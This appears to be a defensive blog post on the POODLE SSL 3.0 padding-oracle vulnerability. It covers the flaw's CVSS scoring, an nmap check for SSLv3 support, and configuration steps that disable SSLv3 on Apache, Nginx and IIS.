POODLE stands for Padding Oracle On Downgraded Legacy Encryption.
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the “POODLE” issue.
Impact
CVSS v2 Base Score: 4.3 (MEDIUM)Impact Subscore: 2.9
Exploitability Subscore: 8.6
Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized disclosure of information
97% of SSL web servers are likely to be vulnerable to POODLE. Similar to the Heartbleed vulnerability, POODLE is an information-disclosure bug rather than a code-injection. It leaves encrypted data open to snooping.It relies on Web servers and browsers that allow the use of the old SSL version 3 protocol to secure its communications. SSL has been surpassed by Transport Layer Security; it’s still widely supported on both servers and clients, and is still required for compatibility with Internet Explorer 6. SSLv3, unlike TLS 1.0 or newer, omits validation of certain pieces of data that accompany each message. Attackers can use this weakness to decipher an individual byte at time of the encrypted data, and therefore extract the plain text of the message byte by byte.
Nmap
Your servers are vulnerable simply if they support SSLv3. Several options here:
nmap -p 443 –script ssl-enum-ciphers (Target URL)
Acunetix
Online Checker
If you see a poodle below, then your browser supports SSLv3 via block ciphers, and you maybe vulnerable. If you see a Springfield Terrier below, your browser doesn’t support SSLv3, or only supports SSLv3 using stream ciphers.

End-user Protection
- Check to see if SSL 3.0 is disabled on your browser (for example, in Internet Explorer it is under Internet Options, Advanced Settings).
- Avoid MITM attacks by making sure “HTTPS” is always on the websites you visit.
- Monitor any notices from the vendors you use regarding recommendations to update software or passwords.
- Avoid potential phishing emails from attackers asking you to update your password – to avoid going to an impersonated website, stick with the official site domain.
Server protection:
The easiest and most robust solution to POODLE is to disable SSLv3 support on your server.
Apache
To disable SSLv3 on your Apache server you can configure it using the following, both in the SSL configuration section and in all SSL-enabled virtual hosts explicitly:
SSLProtocol All -SSLv2 -SSLv3
This will give you support for TLSv1.0, TLSv1.1 and TLSv1.2, but explicitly removes support for SSLv2 and SSLv3. Check the config and then restart Apache.
apachectl configtest
sudo service apache2 restart
NginX
Disabling SSLv3 support on NginX is also really easy.
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
Similar to the Apache config above, you will get TLSv1.0+ support and no SSL. You can check the config and restart.
sudo nginx -t
sudo service nginx restart
IIS
Involves some registry tweaks and a server reboot. Modify/create a registry DWORD value.
HKey_Local_Machine\System\CurrentControlSet\Control\SecurityProviders \SCHANNEL\Protocols
Create an SSL 3.0 key. Under that create a Server key and inside there a DWORD value called Enabled with value 0. Once that’s done reboot the server for the changes to take effect.
Conclusion
As a result of the disclosure of a this critical bug Systems that support only SSL 3.0 are being abandoned as systems operators cease server-side support for the outdated standard.